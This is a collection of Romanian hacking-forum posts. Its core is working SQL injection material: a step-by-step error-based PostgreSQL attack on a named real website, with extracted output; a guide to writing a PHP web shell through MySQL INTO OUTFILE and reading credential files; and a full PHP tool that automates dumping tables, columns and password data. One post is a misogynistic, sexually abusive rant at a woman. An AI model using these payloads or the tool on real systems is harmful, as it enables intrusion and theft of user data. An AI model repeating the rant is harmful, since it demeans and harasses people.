denjacker

s-a mai discutat si aici ..si cred ca si in alte topicuri.

Error: You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'sfwef', NOW(), 'http://www.freesmscraze.com/worldwide/send_free_sms_to_romania/s' at line 1

Short Introduction: Postgre: Traditional relational database management systems (DBMSs) support a data model consisting of a collection of named relations, containing attributes of a specific type. In current commercial systems, possible types include floating point numbers, integers, character strings, money, and dates. Lets start to play with Postgre: 1st Step find the vulnerability: http://www.creatop.com.cn/index.cfm?MenuID=80' ERROR: syntax error at or near "''" its mean this website wants to be injected remember errors can varies you wont get the same error every time. 2nd Step Columns count: http://www.creatop.com.cn/index.cfm?MenuID=80 order by 1-- get valid page http://www.creatop.com.cn/index.cfm?MenuID=80 order by 2-- Error Executing Database Query. ERROR: ORDER BY position 2 is not in select list That Error shows that there is one column. Lets try UNION SELECT query: http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=2 UNION SELECT 1-- Error Executing Database Query. ERROR: UNION types character varying and integer cannot be matched Seems like UNION SELECT query is not working !!! Lets try Errorbased Postgre SQLi… 3rd Step: http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=cast(version() as int)-- ERROR: invalid input syntax for integer: "PostgreSQL 8.4.5 on i486-pc-linux-gnu, compiled by GCC gcc-4.4.real (Ubuntu 4.4.3-4ubuntu5) 4.4.3, 32-bit" As we can see we got version of postgre DB server in the form of error. Lets move on and find database name. http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=cast((select datname from pg_database limit 1 offset 0) as int)-- Error Executing Database Query. ERROR: invalid input syntax for integer: "scoutsqld" Scoutsqld is 1st database name you can variey offset to get other databases names. scoutsqld is first database we can get others by changing offset http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=cast((select datname from pg_database limit 1 offset 1) as int)-- Error Executing Database Query. ERROR: invalid input syntax for integer: "template0" template0 is 2nd database so you can increase offset till you got error. Lets find out the user: http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=cast((select user from pg_database limit 1 offset 0) as int)-- Error Executing Database Query. ERROR: invalid input syntax for integer: "postgres" postgres is the user Lets find the tables :> 4th step: http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=cast((select table_name from information_schema.tables limit 1 offset 0) as int)-- Error Executing Database Query. ERROR: invalid input syntax for integer: "pg_type" pg_type is first table we can get others by changing offset 5th step: Now we have to find the columns from our specific table !!! e.g our table is action for that we have to use oracle char conversion. Pg_type= CHR(112) || CHR(103) || CHR(95) || CHR(116) || CHR(121) || CHR(112) || CHR(101) so our query is : http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=cast((select column_name from information_schema.columns where table_name= CHR(112) || CHR(103) || CHR(95) || CHR(116) || CHR(121) || CHR(112) || CHR(101) limit 1 offset 0) as int)-- Error Executing Database Query. ERROR: invalid input syntax for integer: " typname " And further you can find the columns using offset.. Last step: Now we have to extract data from our column . http://www.creatop.com.cn/index.cfm?MenuID=80 and 1=cast((select typname from pg_type limit 1 offset 0) as int)-- Error Executing Database Query. ERROR: invalid input syntax for integer: "bool" Sorry for any mistake and for my grammar mistakes Thanks all Xploiter

Prin "alt format" nu ma refeream la faptul ca trecem de la vBulletin la phpBB sau ca schimbam categoriile forumului. Practic inca ne mai gandim daca va mai fi vre-un forum sau nu.. Per total dorim o reprofilare, un alt gen de comunitate .. detaliile se vor afla la momentul cel mai potrivit. LE: si nu stiu daca membrii vor mai fi aceiasi care sunt si pe RST.. targetul va fi in mare parte altul.

daca ai numarat bine numarul de coloane si le enumeri cu union select + "hint" ... ar trebui sa reusesti. Ca sa vezi cele 3 coloane CTRL + A .

concat ptr ce pr00f ? output-ul se afiseaza in 3 coloane cum se vede in screenshotul meu de mai sus. Mai baga detalii cu ce nu iti iese..

sunteti foarte aproape ... hint: 0x4e554c4c & CTRL + A

.. se va redeschide peste ceva vreme, intr-un nou format. ON: salut master_of_puppets_jr si bun venit!

Tutorial video in care se explica pasii necesari unui shell upload prin sql injection folosind LOAD_FILE() , INTO DUMPFILE / OUTFILE. Calitate video decenta , durata aprox 8 min. Author: Sh0oter. Download link : Multiupload.com - upload your files to multiple file hosting sites!

Paper about: INTO OUTFILE (Mysql) The FILE privilege If we want to read or write to files we have to have the FILE privilege. First see wich user we are in db with code: 0? UNION SELECT current_user,null /* you can put current_user or user() or system_user This will give us the username@server. //(normally ..@localhost) You can also use the following blind SQL injections query, but it's very booring.. : Guess a name: 1? AND user() LIKE ‘root Brute the name letter by letter: 1? AND MID((user()),1,1)>’m 1? AND MID((user()),2,1)>’m 1? AND MID((user()),3,1)>’m ecc... Now we must acces to mysql.user so.. 0? UNION SELECT 1,2,3,file_priv,4 FROM mysql.user WHERE user = ‘username for username we put the name of current_user. You can also have a look at the whole mysql.user table without the WHERE clause, but I chose this way because you can easily adapt the injection for blind SQL injection: 1? AND MID((SELECT file_priv FROM mysql.user WHERE user = ‘username’),1,1) = ‘Y Naturally, this it's a blind so yuo can't write 1,2,3.. becouse it's not a union select. (but it's subselects ) You can also recieve the FILE privilege info from the information.schema table on MySQL 5: 0? UNION SELECT grantee,is_grantable FROM information_schema.user_privileges WHERE privilege_type = ‘file’ AND grantee like ‘%username% Like IN blind sqli: 1? AND MID((SELECT is_grantable FROM information_schema.user_privileges WHERE privilege_type = ‘file’ AND grantee like ‘%username%’),1,1)=’Y The Web Directory Problem Once we know if we can read/write files we have to check out the right path. In the most cases the MySQL server is running on the same machine as the webserver does and to access our files later we want to write them onto the web directory. If you define no path, INTO OUTFILE will write into the database directory. On MySQL 4 we can get an error message displaying the datadir: 0? UNION SELECT load_file(’a'),null/* On MySQL 5 we use: 0? UNION SELECT @@datadir,null/* The default path for file writing then is datadir\databasename. You can figure out the databasename with: 0? UNION SELECT database(),null/* Now these information are hard to get with blind SQL injection. But you don’t need them necessarily. Just make sure you find out the web directory and use some ../ to jump back from the datadir. If you are lucky the script uses mysql_result(), mysql_free_result(), mysql_fetch_row() or similar functions and displays warning messages. Then you can easily find out the webserver directory by leaving those functions with no input that they will throw a warning message like: Warning: mysql_fetch_row(): supplied argument is not a valid MySQL result resource in /web/server/path/file.php on line xxx To provoke an error like this try something like: 0? AND 1=’0 or add some like param[]=1 This works at the most websites. If you’re not lucky you have to guess the web directory or try to use load_file() to fetch files on the server which might help you. Here is a new list of possible locations for the Apache configuration file, which may spoil the webdirectory path: /etc/init.d/apache /etc/init.d/apache2 /etc/httpd/httpd.conf /etc/apache/apache.conf /etc/apache/httpd.conf /etc/apache2/apache2.conf /etc/apache2/httpd.conf /usr/local/apache2/conf/httpd.conf /usr/local/apache/conf/httpd.conf /opt/apache/conf/httpd.conf /home/apache/httpd.conf /home/apache/conf/httpd.conf /etc/apache2/sites-available/default /etc/apache2/vhosts.d/default_vhost.include Check out the webservers name first by reading the header info and then figure out where it usually stores its configuration files. This also depends on the OS type (*nix/win) so you may want to check that out too. Use @@version or version() to find that out: 0? UNION SELECT @@version,null /* -nt-log at the end means it’s a windows box, -log only means it’s *nix box. Or take a look at the paths in error messages or at the header. Typical web directories to guess could be: /var/www/root/ /var/www/dbname/path/ /var/www/sitename/htdocs/ /var/www/localhost/htdocs Basically you should be allowed to write into any directory where the MySQL server has write access to, as long as you have the FILE privilege. However, an Administrator can limit the path for public write access. Create Useful Files Once you figured out the right directory you can select data and write it into a file with: 0? UNION SELECT columnname,null FROM tablename INTO OUTFILE ‘../../web/path/file.txt ( sometimes from mysql.user ) Or the whole data without knowing the table/column names: 1? OR 1=1 INTO OUTFILE ‘../../web/path/file.txt If you want to avoid splitting chars between the data, use INTO DUMPFILE instead of INTO OUTFILE. You can also combine load_file() with into outfile, like putting a copy of a file to the accessable webspace: 0? AND 1=0 UNION SELECT load_file(’…’) INTO OUTFILE ‘… In some cases I’d recommend to use 0? AND 1=0 UNION SELECT hex(load_file(’…’)) INTO OUTFILE ‘… and decrypt it later with the PHP Charset Encoder, especially when reading the MySQL data files. Or you can write whatever you want into a file: 0? AND 1=0 UNION SELECT ‘code’,null INTO OUTFILE ‘../../web/server/dir/file.php Here are some useful code examples: A Normal code for a shell (PHP): <? system($_GET['lol']); ?> It's very important that the PHP safe_mode must be turned off!!. If is turned on maybe we can bypass symple with a hex converter: We can convert the code for bypass MAGIC_QUOTES_GPC filter. (normally yuo cans ee if hex_mode work with a load_file(pathinhex), like load_file(0x2f6574632f706173737764) for /etc/password (<= usually path) We can see a lot of informations about the webserver configuration with: <? phpinfo(); ?> // SQL QUERY <? ... $result = mysql_query($_GET['query']); ... ?> Try to use load_file() to get the database connection credentials, or try to include an existing file on the webserver which handles the mysql connect. REmember that the quotes are required and so if the error are like: error db near '\/www/root/path/page.php'\ maybe it's becouse the quotes are not allowed (with special filter used for anti-xss) Credits Goes To:xaDoS & Johannes Dahse

Daca esti foarte paranoic.... $whitespace = array (' ', '+', '/**/', '/*!*/', '/*', '--', '%23', '%20', '%09', '%0a', '%0b', '%0c', '%0d', '%a0', 'union', 'select', '.', '=', '<', '>', '^', '!=', '%', '/', '*', '&', '&&', '|', '||', '>>', '<<', '>=', '<=', '<>', '<=>', 'XOR', 'DIV', 'SOUNDS LIKE', 'RLIKE', 'REGEXP', 'IS', 'NOT', 'BETWEEN', 'concat', 'group', 'ws', '_', '@@', '(', ')', 'and', 'false', 'substring', 'benchmark', ',', 'information', 'schema', 'from', 'where', 'order', 'group', 'limit', 'find_in_set', 'or', 'having', 'extractvalue', 'xmlupdate', 'procedure', 'if', '%00' ); Am adaugat cam ce mi-a venit acum in minte. foreach ($whitespace as $key => $aham { ...do some stuff... } Ce primesti din $_POST , $_GET treci prin strtolower() si dai replace la ce ai in array... Sau daca nu vrei cu array si black-list function inputFilter(){ foreach($_POST as $key => $p) { $_POST[$key] = htmlentities($p); $_POST[$key] = mysql_real_escape_string($p); $_POST[$key] = html_entity_decode($p); } foreach($_GET as $key => $g) { $_GET[$key] = htmlentities($g); $_GET[$key] = mysql_real_escape_string($g); $_GET[$key] = html_entity_decode($g); } foreach($_REQUEST as $key => $r) { $_REQUEST[$key] = mysql_real_escape_string($r); } } Sau poti sa le combini.. Teoretic, ar trebuii sa fie de ajuns. (teoretic ! )

Anumite lucruri sunt nepretuite, pentru toate celelalte exista mastercard : )))

Selectarea Motorului de Cautare - Dupa definirea campurilor si modificatorilor urmeaza unul sau mai multi modificatori care specifica atribute la nivel de tabela. Dintre acestia cel mai frecvent utilizat este modificatorul ENGINE, care informeaza MySQL ce motor de stocare, sau tip de tabela sa utilizeze. In MySQL sunt disponibile o serie de motoare de stocare, fiecare cu avantajele si caracteristicile sale. ISAM - Motorul mostenit de la versiunile anterioare. MYISAM - Revizuire a motorului ISAM, cu suport pentru campuri cu lungime dinamica. INNODB - Motor tranzactional conform cu ACID, cu suport pentru chei straine. MEMORY - Motor bazat pe memorie, cu suport pentru indexuri hash. CVS - Motor bazat pe text, pentru seturi de inregistrari CVS. ARCHIVE - Motor cu facilitati de compresie pentru seturi de inregistrari mari. FEDERATED - Motor pentru tabele aflate la distanta. NDB - Motor pentru tabele grupate in clustere. MERGE - Motor pentru tabele fuzionate. BLACKHOLE - Motor Bitbucket. Sunt definite, clasificate si explicate foarte bine in cartea MySQL Database Usage & Administration - Vikram Vaswani, disponibila aici !

Târfele's tot târfe, indiferent de sex. In orice situatie, orice ar fi .. ele nu pot pur si simplu sa faca apel la ultima firimitura de bun simt si sa renunte la umflatu' in pene. Ea trebuie sa fie cea mai tare'n replici, sa zbiere cel mai tare, sa aiba intotdeauna dreptate si neaparat sa aiba ultimele cuvinte de spus. Mi-e dor de PAX in astfel de situatii! Benny .. nu stiu de ce iti pierzi timpul cu anonima asta! Nu e amuzanta, nici capul nu o duce prea departe si nici nu reusesti s-o scoti la capat cu ea sa o faci sa inteleaga ce e de inteles.. pentru ca e doar o târfa ieftina cu chef de "impus respect". Nu sunt misogin de fel dar cele de categoria ta trebuie sa-si cunoasca locul si sa citeasca de 2 ori inainte sa dea click pe Submit reply. Si daca te zgarie pe suflet ce tocmai ti-am zis sa sti ca o meriti din plin. Vrei sa te dai o "Lady" si ceri singura pula omului sa ti-o infiga in gat cand tocmai si-a cerut scuze. Târfo..

Neme sa ai o viata linistita si sa te bucuri de familie. Mult succes! TinCode ... bafta fa!

Subliminal Messages YouTube - ?Farhank, Subliminal Messages?? +

A hacker is claiming that a security hole in a server at NASA's Goddard Space Flight Center has exposed data related to a satellite-based Earth observation system used to aid in disaster relief. The hacker, who uses the handle "Tinkode" has published a screen capture from what he claims is an FTP (File Transfer Protocol) server at NASA's Goddard Center. The hack comes exactly a month after the same hacker exposed a similar hole in a server operated by the European Space Agency. The screenshot from the server at the Goddard Space Center was published on Tuesday. It shows a directory tree from the server, servir.gsfc.nasa.gov, which appears to be connected with NASA's SERVIR program. It is not clear what the purpose of the server is or the nature of the security hole exploited by Tinkode. More: Hack Targets NASA's Earth Observation System | threatpost

La multi ani tuovarâse!

Ai fi fost sefu' tribului daca postai si tu asta prin 2006-2007. Te mai si umflii in pene ..

<?php //author:www.vul.kr error_reporting(0); ini_set("max_execution_time",0); ini_set("default_socket_timeout",10); $server=$argv[1]; $mode=$argv[2]; $database=$argv[3]; $server=str_replace("\"","",$server); $num=0; if(!$server||!$mode){ print_r(' --------------------------Begin Code By www.vul.kr------------------------------ Usage: php.exe '.$argv[0].' Url Options Database Table Options: 1 Show Union Number [MYSQL 4/5 VERSION] 2 Show Tables [MYSQL 5 VERSION] 3 Show Columns [MYSQL 5 VERSION] 4 Show Content [MYSQL 4/5 VERSION] 5 Guess Tables [MYSQL 4 VERSION] 6 Guess Columns [MYSQL 4 VERSION] -------------------------------End----------------------------------------- '); exit; } function str_todex($string){ $num=strlen($string); for($i=0;$i<$num;$i++){ $str=substr($string,$i,$i+1); $ascii=ord($str); $hex.=dechex($ascii); } $hex="0x".$hex; return $hex; } if($mode==1) { $injstr="0x5B676F6F676C656F72675D"; $ins=$injstr; for($j=1;$j<=50;$j++){ $expurl=$server."%09and%091=2%09UnIoN%09SeLeCt%09".$injstr."%23"; echo ".."; $reponse=@file_get_contents($expurl); if(strstr($reponse,"[googleorg]")){ echo "\r\nFind Colnums Numbers: $j \r\n";break;} $injstr=$ins.",".$injstr; } $expurlps=$server."%09and%091=2%09UnIoN%09SeLeCt%09"; $data=$expurlps; $aall=""; $dote=","; for($k=1;$k<=$j;$k++) { $aall=$aall.$k.$dote; } $unum=substr($data.$aall,0,strlen($data.$aall)-1); $expurl="%23"; $rurl=$unum.$expurl; $fp=fopen("url.txt","w"); fwrite($fp,$rurl); //echo "\r\n$rurl"; echo "\r\n go and see url.txt"; } elseif($mode==2){ if($argc<>6) {echo "\r\ninjection-url option database Union-NO Union-postion\r\n";exit;} //-----------------------------get the NO of tables------------------------------------------------------------ $expurl0=$server."%09and%091=2%09UnIoN%09SeLeCt%09"; $UnIoNnum=$argv[4]+500; $data=$expurl0; $aall=""; $dote=","; for($k=501;$k<=$UnIoNnum;$k++) { $aall=$aall.$k.$dote; } $unum=$data.substr($aall,0,strlen($aall)-1); $replacetext="CoNcAt(0x5B676F6F676C656F72675D,count(*),0x5B2F676F6F676C656F72675D)"; $expurl1.="%09FrOm%09information_schema.tables%09";$expurl1.="WhErE%09TABLE_SCHEMA=".str_todex($database)."%23"; $rurl=$unum.$expurl1; $search=$argv[5]+500; $endurl=str_replace($search,$replacetext,$rurl); //--------------------------------------------------------------------------------------------- $reponse1=@file_get_contents($endurl); preg_match_all('/\[googleorg\](.*?)\[\/googleorg\]/i',$reponse1,$matchs1); if($crack1=($matchs1[1])){$Tnum=$crack1[0];echo "\r\nFind $Tnum tables\r\n";} for($i=0;$i<$Tnum;$i++){ echo "\r\n"; //-----------------------------Get tables----------------------------------------------------------- $expurfirst=$server."%09and%091=2%09UnIoN%09SeLeCt%09"; $data=$expurfirst; $aall=""; $dote=","; for($k=501;$k<=$UnIoNnum;$k++) { $aall=$aall.$k.$dote; } $unum=substr($data.$aall,0,strlen($data.$aall)-1); $replacetxt="CoNcAt(0x5B676F6F676C656F72675D,TABLE_NAME,0x5B2F676F6F676C656F72675D)"; $expurl="%09FrOm%09information_schema.tables%09";$expurl.="WhErE%09TABLE_SCHEMA=".str_todex($database)."%09limit%09$i,1%23"; $rurl=$unum.$expurl; $endurl=str_replace($search,$replacetxt,$rurl); //------------------------------------------------------------------------------------------------ $reponse=@file_get_contents($endurl); preg_match_all('/\[googleorg\](.*?)\[\/googleorg\]/i',$reponse,$matchs); if($crack=($matchs[1])) {$fp=fopen("table.txt","a+");fwrite($fp,$crack[0]."\r\n");echo $crack[0]."\t";} //else{echo "Done!\r\n";break;} }} elseif($mode==3){ $table=$argv[6]; if($argc<>7) {echo "\r\ninjection-url option database Union-NO Union-postion tablename\r\n";exit;} //--------------------------------get count colnums------------------------------------------------------------ $expurlexp=$server."%09and%091=2%09UnIoN%09SeLeCt%09"; $UnIoNnum=$argv[4]+500; $data=$expurlexp; $aall=""; $dote=","; for($k=501;$k<=$UnIoNnum;$k++) { $aall=$aall.$k.$dote; } $unum=$data.substr($aall,0,strlen($aall)-1); $replacetx="CoNcAt(0x5B676F6F676C656F72675D,count(*),0x5B2F676F6F676C656F72675D)"; $expurl2="%09FrOm%09information_schema.COLUMNS"; $expurl2.="%09WhErE%09TABLE_SCHEMA=".str_todex($database)."%09and%09TABLE_NAME=".str_todex($table)."%23"; $rurl=$unum.$expurl2; $search=$argv[5]+500; $endurl=str_replace($search,$replacetx,$rurl); //--------------------------------------------------------------------------------------------- $reponse2=@file_get_contents($endurl); preg_match_all('/\[googleorg\](.*?)\[\/googleorg\]/i',$reponse2,$matchs2); if($crack2=($matchs2[1])){$Cnum=$crack2[0];echo "\r\nFind $Cnum Colnums\r\n";} for($i=0;$i<$Cnum;$i++){ //--------------------------------Get Colnums------------------------------------------------------------ $expurlps=$server."%09and%091=2%09UnIoN%09SeLeCt%09"; $data=$expurlps; $aall=""; $dote=","; for($k=501;$k<=$UnIoNnum;$k++) { $aall=$aall.$k.$dote; } $unum=substr($data.$aall,0,strlen($data.$aall)-1); $replay="CoNcAt(0x5B676F6F676C656F72675D,COLUMN_NAME,0x5B2F676F6F676C656F72675D)"; $expurl="%09FrOm%09information_schema.COLUMNS"; $expurl.="%09WhErE%09TABLE_SCHEMA=".str_todex($database)."%09and%09TABLE_NAME=".str_todex($table)."%09Limit%09$i,1%23"; $rurl=$unum.$expurl; $search=$argv[5]+500; $endurl=str_replace($search,$replay,$rurl); //--------------------------------------------------------------------------------------------- $reponse=@file_get_contents($endurl); preg_match_all('/\[googleorg\](.*?)\[\/googleorg\]/i',$reponse,$matchs); if($crack=($matchs[1])) {$fp=fopen("column.txt","a+");fwrite($fp,$crack[0]."\r\n");echo $crack[0]."\t";} //else{echo "Down!\r\n";break;} } } //--------------------------MYSQL4.0 Guess table--------------------------------------- elseif($mode==5) { if($argc<>5) {echo "\r\ninjection-url option Union-NO Union-postion \r\n";exit;} $tmptalble=array( 'users','user','admin','ident','adminlog','members','member','eq_users', 'tb_users','tbl_user','login','logging','nuke_users','admins','group_members', 'phpbb_users','administrator','admin_log','pass_admin','wp_users','accounts','adminlogin', 'auth','authenticate','authentication','account','customers','config','conf','cfg','sb_host_admin', 'WebAdmin','super','administrateurs','webmaster','webmasters','webuser','userinfo','userlist','sysadmins', 'manager','memberlist','logs','login','customer','edit','editor','administration','accounts','cms_admin','cms_admins', 'cms_user','cms_users','xoops_users','vbulletin_user','vb_user','user_login','user_logins','user_admin','tb_member', 'tb_members','tb_administrator','tb_login','tb_user','sysadmin','smf_members','smallnuke_members','site_logins','site_login', 'sitelogin','siteslogins','punbb_users','poll_user','phpBB2.phpbb_users','phpBB2.forum_users','phpbb_users','phorum_user', 'nuke_users','nuke_authors','mybb_users','mysql.user','login_admin','login_admins','login_user','login_users','jos_users', 'jos_joomblog_users','ipb.ibf_members','ibf_members','forum.ibf_members','fusion_users','e107_user','e107.e107_user','dbadmins', 'cpg132_users','chat_users','article_admin','Administratoren','administrieren','4images_users'); $expurlexp=$server."%09and%091=2%09UnIoN%09SeLeCt%09"; $UnIoNnum=$argv[3]+500; $data=$expurlexp; $aall=""; $dote=","; for($k=501;$k<=$UnIoNnum;$k++) { $aall=$aall.$k.$dote; } $unum=$data.substr($aall,0,strlen($aall)-1); $replay="0x5B676F6F676C656F72675D"; $expurl="%09FrOm%09[chinapost]%23"; $rurl=$unum.$expurl; $search=$argv[4]+500; $endurl=str_replace($search,$replay,$rurl); $endurl2=$endurl; //--------------------------------------------------------------------------------------------- for($j=0;$j<count($tmptalble);$j++){ $tb=$tmptalble[$j]; $endurl=str_replace("[chinapost]",$tb,$endurl); $reponse=@file_get_contents($endurl); if(strstr($reponse,"[googleorg]")){echo "\r\nFind Table: ".$tmptalble[$j];} $endurl=$endurl2;}} //--------------------------MYSQL4.0 Guess Colnums--------------------------------------- elseif($mode==6) { if($argc<>7) {echo "\r\ninjection-url option Union-NO Union-Postion Choose-postion tablename \r\n";exit;} $tmpcol=array( 'id','uid','userid','username','cst','user','pseudo','pw','pass','password','uname','login','login_user','memeber_pass','memberpwd', 'login_pass','login_name','userpassword','userpw','userpwd,','member_pwd','memberpw','user_name','name','usr','adminname','admin','adminpass','adminpassword','passwd','adminpasswd','pwd','script','user_login','user_pass','login_passwort','usrname','usrpass', 'usr_pass','userpass','user_password','administrator','usrpw','adminpwd','adminpw','userPassword','Userlogin','Administratorzy', 'Administrator','pWord','passer','Passw','membres','membername','wp_users','usrs','usrnam','usrname','usrn','usernm','useradmin', 'user_usrnm','user_usernm','user_pword','user_pwrd','user_pwd','user_passw','user_email','user_admin','pwrd','pword','psw','passw', 'pass_word','pass_hash','p_word','memlogin','mempassword','members','membername','memberid','member_name','member_id','mem_pwd','mem_password','mem_passwd','mem_pass','mem_login','mail','md5hash','logins','login_username','login_user','login_pwd','auth', 'adminuserid','adminuser','adminemail','admin_userid','admin_user','admin_pwd','admin_password','admin_passwd','admin_pass', 'admin_name','account','accounts','sb_admin_name','sb_pwd'); $expurlexp=$server."%09and%091=2%09UnIoN%09SeLeCt%09"; $UnIoNnum=$argv[3]+500; $Gtable=$argv[6]; $data=$expurlexp; $aall=""; $dote=","; for($k=501;$k<=$UnIoNnum;$k++) { $aall=$aall.$k.$dote; } $unum=$data.substr($aall,0,strlen($aall)-1); $replay="0x5B676F6F676C656F72675D"; $expurl="%09FrOm%09".$Gtable."%23"; $rurl=$unum.$expurl; $search=$argv[4]+500; $SeLeCtsearch=$argv[5]+500; $endurl=str_replace($search,$replay,$rurl); $endurl2=$endurl; //--------------------------------------------------------------------------------------------- for($j=0;$j<count($tmpcol);$j++){ $tb=$tmpcol[$j]; $endurl=str_replace($SeLeCtsearch,$tb,$endurl); $reponse=@file_get_contents($endurl); if(strstr($reponse,"[googleorg]")){ echo "\r\nFind Column: ".$tmpcol[$j];} $endurl=$endurl2;}} elseif($mode==4){ $table=$argv[6]; $column=$argv[7]; $column2=$argv[8]; if($argc<>9) {echo "\r\ninjection-url option database Union-NO Union-postion tablename colnum1 colnum2\r\n";exit;} //--------------------------------Get contents count------------------------------------------------------------- $expurlexp=$server."%09and%091=2%09UnIoN%09SeLeCt%09"; $UnIoNnum=$argv[4]+500; $data=$expurlexp; $aall=""; $dote=","; for($k=501;$k<=$UnIoNnum;$k++) { $aall=$aall.$k.$dote; } $unum=$data.substr($aall,0,strlen($aall)-1); $replacetx="CoNcAt(0x5B676F6F676C656F72675D,count(*),0x5B2F676F6F676C656F72675D)"; $expurl2="%09FrOm%09$database.$table%23"; $rurl=$unum.$expurl2; $search=$argv[5]+500; $endurl=str_replace($search,$replacetx,$rurl); //--------------------------------------------------------------------------------------------- $reponse2=@file_get_contents($endurl); preg_match_all('/\[googleorg\](.*?)\[\/googleorg\]/i',$reponse2,$matchs2); if($crack2=($matchs2[1])){$Cnum=$crack2[0];echo "\r\nFind $Cnum recodes\r\n";} for($i=0;$i<$Cnum;$i++){ //--------------------------------Get contents------------------------------------------------------------ $expurlps=$server."%09and%091=2%09UnIoN%09SeLeCt%09"; $data=$expurlps; $aall=""; $dote=","; for($k=501;$k<=$UnIoNnum;$k++) { $aall=$aall.$k.$dote; } $unum=substr($data.$aall,0,strlen($data.$aall)-1); $replay="CoNcAt(0x5B676F6F676C656F72675D,".$column.",0x7C,".$column2.",0x5B2F676F6F676C656F72675D)"; $expurl="%09FrOm%09$database.$table%09Limit%09$i,1%23"; $rurl=$unum.$expurl; $search=$argv[5]+500; $endurl=str_replace($search,$replay,$rurl); //--------------------------------------------------------------------------------------------- $reponse=@file_get_contents($endurl); preg_match_all('/\[googleorg\](.*?)\[\/googleorg\]/i',$reponse,$matchs); if($crack=($matchs[1])) {$fp=fopen("content.txt","a+");fwrite($fp,$crack[0]."\r\n");echo $crack[0]."\t";} //else{echo "done!\r\n";break;} } } ?> http://img.vul.kr/uploads/20090729/1248888141mysql-auto.txt